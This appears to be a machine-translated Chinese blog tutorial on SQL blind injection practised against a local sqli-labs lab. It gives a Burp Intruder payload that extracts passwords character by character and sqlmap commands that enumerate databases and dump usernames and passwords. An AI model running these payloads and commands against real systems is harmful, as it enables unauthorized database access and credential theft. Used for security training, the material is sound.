当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- 《牛客刷verilog》Part II Verilog进阶挑战
- Writing skills of multi plate rotation strategy -- strategy writing learning materials
- FuncS sh file not found when using the benchmarksql tool to test kingbases
- Auman Galaxy new year of the tiger appreciation meeting was held in Beijing - won the double certification of "intelligent safety" and "efficient performance" of China Automotive Research Institute
- Prefix and (continuously updated)
- Php+mysql registration landing page development complete code
- When using the benchmarksql tool to test the concurrency of kingbasees, there are sub threads that are not closed in time after the main process is killed successfully
- Leetcode simple question: check whether the string is an array prefix
- Games101 Lesson 9 shading 3 Notes
- BMZCTF simple_ pop
猜你喜欢
C language series - Section 3 - functions
2022 t elevator repair simulation examination question bank and t elevator repair simulation examination question bank
Sdl2 + OpenGL glsl practice (Continued)
Web security - CSRF (token)
联发科技2023届提前批IC笔试(题目)
After reviewing MySQL for a month, I was stunned when the interviewer of Alibaba asked me
Pyqt control part (II)
X-ray normal based contour rendering
Library management system based on SSM
The programmer went to bed at 12 o'clock in the middle of the night, and the leader angrily scolded: go to bed so early, you are very good at keeping fit
随机推荐
JS multidimensional array to one-dimensional array
Library management system based on SSM
Php+mysql registration landing page development complete code
Solve BP Chinese garbled code
How to use kotlin to improve productivity: kotlin tips
Writing skills of multi plate rotation strategy -- strategy writing learning materials
有道云笔记
2022 registration of G2 utility boiler stoker examination and G2 utility boiler stoker reexamination examination
[software testing-6] & Test Management
Leetcode simple question: the key with the longest key duration
Auman Galaxy new year of the tiger appreciation meeting was held in Beijing - won the double certification of "intelligent safety" and "efficient performance" of China Automotive Research Institute
220214c language learning diary
After reviewing MySQL for a month, I was stunned when the interviewer of Alibaba asked me
Introduction of pointer variables in function parameters
UiPath实战(08) - 选取器(Selector)
[set theory] binary relationship (definition field | value field | inverse operation | inverse synthesis operation | restriction | image | single root | single value | nature of synthesis operation)
Two drawing interfaces - 1 Matlab style interface
使用BENCHMARKSQL工具对KingbaseES预热数据时执行:select sys_prewarm(‘NDX_OORDER_2 ‘)报错
AWS VPC
After job hopping at the end of the year, I interviewed more than 30 companies in two weeks and finally landed